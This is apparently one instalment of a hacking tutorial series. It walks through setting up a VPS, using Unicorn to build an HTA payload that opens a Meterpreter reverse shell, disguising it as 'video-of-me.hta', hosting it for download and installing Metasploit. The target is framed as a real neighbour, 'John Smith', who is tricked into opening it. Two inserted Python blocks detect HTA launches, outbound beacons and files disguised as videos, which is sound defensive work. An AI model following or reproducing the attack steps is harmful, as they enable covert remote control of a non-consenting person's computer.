In the previous article in this short series, we learned how to find our neighbor's name using publicly accessible information and how to monitor device activity on their home network. With this information at our disposal, it's time to install and configure the tools needed to begin our attack on John Smith's computer.
First, we'll purchase a Virtual Private Server (VPS) in the cloud, which we'll use to host our payload so that it can be downloaded from any computer in the world. Then, we'll create our payload. In this case, we're going to take advantage of HTML Applications (HTA), a lesser-known file type, and use it to trick our target into opening a malicious HTA file on their computer. Last, we'll install Metasploit, which will be used to interface with and control the compromised machine after our malicious HTA file is opened on John's computer.
Step 1: Set Up the VPS
To secure a place for our payload on the web and to run the Metasploit session, we'll need a VPS. Many VPS providers will work adequately for this hack. Some noteworthy ones you can check out include OVH, VPSdime, VPS.net, and Vultr. As an example, I'll be using DigitalOcean, but if you're more comfortable with another VPS provider, feel free to set up a Debian or Ubuntu VPS with your preferred provider and skip to Step 2.
As for DigitalOcean, I recommend the $10/month plan, as the cheaper option doesn't meet the hardware requirements to run Metasploit. I encountered "cannot allocate memory" errors when using DigitalOcean's cheapest $5/month option.
To create a DigitalOcean account, visit their signup page. Enter your email address and create a password. You'll then be asked to enter billing information and create a "Droplet," which is what DigitalOcean calls its cloud servers.
Droplets take only a few minutes to configure. Simply click the operating system and hardware specifications of your choosing, and DigitalOcean will create that operating system for you. I created a Debian 9 Droplet.
Then, you'll be asked to choose a "datacenter region." This defines where in the world your server appears to originate from. You can choose any region you like. You'll notice almost no latency using servers in other regions, and it won't affect any part of this hack.
Next, you can rename the Droplet to anything you like or leave the default name. Click the "Create" button to start the Droplet creation process.
Creating the Droplet can take up to 5 minutes. A progress bar is displayed while you wait, and an email containing the SSH password to your new VPS will be sent to you.
When the progress bar completes, an IP address will appear in the IP Address column. This is the IP address you'll use to connect to your VPS, or "Droplet."
To connect to your new DigitalOcean server, enter the ssh command below into a terminal.
If all went well, you should now have remote access to your first DigitalOcean server, where we'll host our payload and install Metasploit in later steps. If you experienced issues setting up your DigitalOcean account or Droplet, reference the DigitalOcean Droplet page or contact DigitalOcean for assistance. If you used a different VPS service, of course, consult their documentation for help.
There will likely be an Nginx service running on your new Droplet. These Nginx servers are preconfigured by DigitalOcean. This may conflict with later steps in this tutorial, so be sure to stop the running Nginx service. If you used a different VPS, you (hopefully) won't have to worry about this.
To stop Nginx, type the command below.
sudo systemctl stop nginx
Step 2: Create the HTA Payload
Based on the MAC addresses connecting to My-Neighbor's wireless network, it's reasonable to assume there are several internet-connected Windows devices on the target network.
To create our payload, we'll use the Unicorn GitHub repository, which has features that let us generate HTML Application payloads. HTA is a lesser-known file type: an HTML executable file format. There's a good chance non-tech-savvy users have never heard of the HTA file format, which means it could be easy to convince a victim that it's a video or photo format.
In this tutorial, we'll trick our victim, John Smith, into clicking on our video.hta file by telling him it's a video file. When opened, the HTA file will create a reverse shell on John's computer and allow us to remotely access the compromised device.
I'll be installing and using Unicorn from our newly created DigitalOcean server running Debian 9 (or whatever VPS you chose). Unicorn is a Python script, so there are no dependencies, and it will work on any operating system where Python is installed.
Before we begin, make sure git is installed on our new DigitalOcean (or other) server. We'll need it to clone the Unicorn repository. While we're at it, make sure python and python3 are installed as well. You can install them all at once by typing the apt-get command below into your terminal.
sudo apt-get install git python python3
Next, clone the Unicorn repository by typing the command below.
git clone https://github.com/trustedsec/unicorn.git
Then, change into the unicorn directory using the cd command.
Now, to generate our HTA payload, we'll use the command below.
python unicorn.py windows/meterpreter/reverse_tcp Your-Server-IP-Address 55555 hta
- The windows/meterpreter/reverse_tcp part instructs Unicorn to create a TCP connection from our victim's machine. It's possible to create HTTP and HTTPS connections, but to avoid potential complications, we'll use a simple TCP connection.
- The Your-Server-IP-Address part is, of course, the IP address of your DigitalOcean (or other) server. This is the IP address our victim's machine will connect back to when they open our HTA payload.
- 55555 is the port our Metasploit session will listen on and the port the victim machine will attempt to connect back to. This number can be anything between 1024 and 65535. It's generally a bad idea to assign port numbers below 1024, as those ports are preassigned or "registered" to popular services.
- The hta part is the file format we want Unicorn to generate. As mentioned earlier, Unicorn supports a variety of payload types, including macro, CRT, and DDE. To learn more about these file formats and how they can be used in attacks, check out the Unicorn GitHub page.
When that's done, Unicorn will tell us to check the "hta_attack" directory to find the files it generated. Change into the "hta_attack" directory with the cd command, and use ls to view the directory contents.
"Launcher.hta" is our HTA payload. We'll need our victim to click on this file, so let's rename it to something more appropriate for our victim. As we'll see in later steps, I'm going to tell John the .hta file is a "video" of someone he knows, so let's give it a more convincing name. Use the mv command to rename the HTA file.
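From the victim's side, the connection described in these bullets has a recognizable footprint: mshta.exe (the program Windows uses to run .hta files) is started on a file the user just downloaded and then opens an outbound TCP connection to an arbitrary high port on an internet host. The following is an added detection example, not code from the original article or from Unicorn or Metasploit. The events are constructed in a simplified Sysmon-like layout, and the field names (event, pid, image, cmdline, dst_ip, dst_port) and the 203.0.113.10 address are assumptions for the example, not any vendor's schema.

```python
"""Added example (not part of the original article): flag the victim-side
footprint of an HTA launcher, i.e. mshta.exe running a user-supplied .hta
and then connecting out to a non-web port, over constructed sample events."""

WEB_PORTS = {80, 443}                      # ports where outbound traffic is ordinary
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\")  # paths a download lands in

# Constructed sample telemetry in a simplified Sysmon-like layout (assumed field names).
SAMPLE_EVENTS = [
    {"event": "process_create", "pid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Users\john\Downloads\video-of-me.hta"'},
    {"event": "network_connect", "pid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "dst_ip": "203.0.113.10", "dst_port": 55555},
    {"event": "process_create", "pid": 5300, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\firefox.exe"'},
    {"event": "network_connect", "pid": 5300, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "203.0.113.10", "dst_port": 80},
    # A benign-looking use: an HTA shipped with installed software, no network activity.
    {"event": "process_create", "pid": 6100, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\VendorTool\tool.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\VendorTool\setup.hta"'},
]


def image_name(path):
    """Return the lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_hta_activity(events):
    """Return (pid, kind, detail) tuples for suspicious mshta.exe behaviour.

    kind is "launch" when mshta.exe ran an .hta from a user-writable path and
    "beacon" when mshta.exe opened an outbound connection to a non-web port.
    """
    alerts = []
    for e in events:
        if image_name(e.get("image", "")) != "mshta.exe":
            continue
        if e["event"] == "process_create":
            cmd = e.get("cmdline", "").lower()
            if ".hta" in cmd and any(d in cmd for d in USER_WRITABLE):
                alerts.append((e["pid"], "launch", "mshta.exe ran an .hta from a user-writable path"))
        elif e["event"] == "network_connect" and e["dst_port"] not in WEB_PORTS:
            alerts.append((e["pid"], "beacon",
                           f"mshta.exe connected out to {e['dst_ip']}:{e['dst_port']}"))
    return alerts


def high_confidence_pids(events):
    """PIDs that show both indicators: a user-supplied .hta launch and an outbound beacon."""
    kinds_by_pid = {}
    for pid, kind, _ in find_hta_activity(events):
        kinds_by_pid.setdefault(pid, set()).add(kind)
    return {pid for pid, kinds in kinds_by_pid.items() if kinds == {"launch", "beacon"}}


if __name__ == "__main__":
    for pid, kind, detail in find_hta_activity(SAMPLE_EVENTS):
        print(f"pid {pid} [{kind}]: {detail}")
    print("high-confidence:", sorted(high_confidence_pids(SAMPLE_EVENTS)))
```

Either indicator on its own produces noise (installers legitimately ship .hta files, and some ship them under a user's profile), so the correlation in high_confidence_pids is what a responder would page on; the single-indicator alerts are worth keeping as lower-severity context.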
mv Launcher.hta video-of-me.hta
The "index.html" file is some HTML created by Unicorn that we won't need in this tutorial. Remove it with the rm command.
The "unicorn.rc" file is a small resource file that will automate the Metasploit configuration. We don't need this right now, but keep it in mind, as we'll need it in a later step.
Last, we need the "video-of-me.hta" payload to be downloadable and accessible to any internet-connected device. Let's use Python3 to create a simple server to host the file. While still in the "hta_attack" directory, type the command below to start a Python3 server.
sudo python3 -m http.server 80 &
http.server is the Python3 HTTP server module, which the -m argument tells Python to run. 80 is the port number the HTTP server will listen on. The & tells the terminal to execute the Python3 server as a background process, so if our SSH connection to the VPS gets interrupted or we just want to log out, the server will continue hosting our HTA payload.
We can verify our Python3 server is up and running by visiting http://Your-Server-IP-Address/video-of-me.hta from any web browser. Visiting this page should prompt your web browser with a "video-of-me.hta" download.
That's it for installing Unicorn and hosting the HTA payload. Let's move on to installing the Metasploit Framework.
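The whole trick in this step is that the file is named like a video but is really a text document that mshta.exe executes. A file's name says nothing about its contents, so the check a download scanner or help desk should make is on the bytes. Below is an added example, not code from the original article or from Unicorn, that tells a real video container apart from an HTML Application by inspecting content. The sample HTA and MP4 header are constructed for the example; the HTA body is a placeholder that only shows a message box.

```python
"""Added example (not part of the original article): decide whether a file
handed over as a 'video' is really a video container or an HTML Application
by looking at its bytes rather than its name."""
import re

MEDIA_EXTENSIONS = {"mp4", "m4v", "mov", "mkv", "webm", "avi"}

# Indicators of HTA content, matched case-insensitively on the first 64 KiB.
HTA_PATTERNS = {
    "hta:application element": re.compile(rb"<hta:application", re.I),
    "script block": re.compile(rb"<script", re.I),
    "VBScript/JScript language attribute":
        re.compile(rb"language\s*=\s*['\"]?(vbscript|jscript)", re.I),
}


def is_video_container(data: bytes) -> bool:
    """True if the data starts with a recognised video container signature."""
    if len(data) >= 12 and data[4:8] == b"ftyp":        # ISO base media: MP4, MOV, M4V
        return True
    if data[:4] == b"\x1a\x45\xdf\xa3":                  # EBML header: Matroska, WebM
        return True
    if data[:4] == b"RIFF" and data[8:12] == b"AVI ":    # RIFF AVI
        return True
    return False


def hta_indicators(data: bytes) -> list:
    """Names of the HTA indicators present in the start of the file."""
    head = data[:65536]
    return [name for name, pat in HTA_PATTERNS.items() if pat.search(head)]


def classify(filename: str, data: bytes) -> dict:
    """Classify content and report whether the name makes a claim the bytes contradict."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    indicators = hta_indicators(data)
    if is_video_container(data):
        verdict = "video"
    elif "hta:application element" in indicators or ext == "hta":
        verdict = "hta"
    elif indicators:
        verdict = "html-or-script"
    else:
        verdict = "unknown"
    claims_media = ext in MEDIA_EXTENSIONS or "video" in filename.lower()
    return {"verdict": verdict, "indicators": indicators,
            "name_mismatch": claims_media and verdict != "video"}


# Constructed samples: a harmless placeholder HTA and the first bytes of an MP4 file.
SAMPLE_HTA = (b'<html><head><hta:application id="app"></hta:application>\n'
              b'<script language="VBScript">\n'
              b"' constructed placeholder body for the example\n"
              b'MsgBox "hello"\n'
              b"</script></head><body></body></html>\n")
SAMPLE_MP4 = b"\x00\x00\x00\x18ftypisom\x00\x00\x02\x00isomiso2mp41" + b"\x00" * 32


if __name__ == "__main__":
    print(classify("video-of-me.hta", SAMPLE_HTA))
    print(classify("holiday.mp4", SAMPLE_MP4))
```

The name_mismatch flag is the useful output: a file called "video-of-me" that parses as an HTML document with a script block is worth quarantining regardless of which extension it carries, and an mp4-named file whose first bytes are HTML is the same finding in a different wrapper.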
Step 3: Install Metasploit
The Metasploit developers created a simple installer script that automates the entire installation process. To begin, download the installer script and save it to a local file. We can do this with the command below.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
Then, ensure the file has permission to execute on your VPS using the chmod command.
sudo chmod 755 msfinstall
Last, run the newly created "msfinstall" file as root to install Metasploit.
The Metasploit installation should complete in less than 2 minutes. The installer script worked without any errors on my Debian 9 DigitalOcean Droplet. For information on installing Metasploit on other distributions, see the official installation instructions.
Congratulations on setting everything up! In this part of the series, we created the VPS, generated our payload, and installed the Metasploit Framework. We're almost ready to execute the attack. In the next and final part of this series, we'll discuss how to set up a simple website to social engineer your intended victim into opening our malicious HTA payload, as well as what we can do to protect ourselves from such attacks.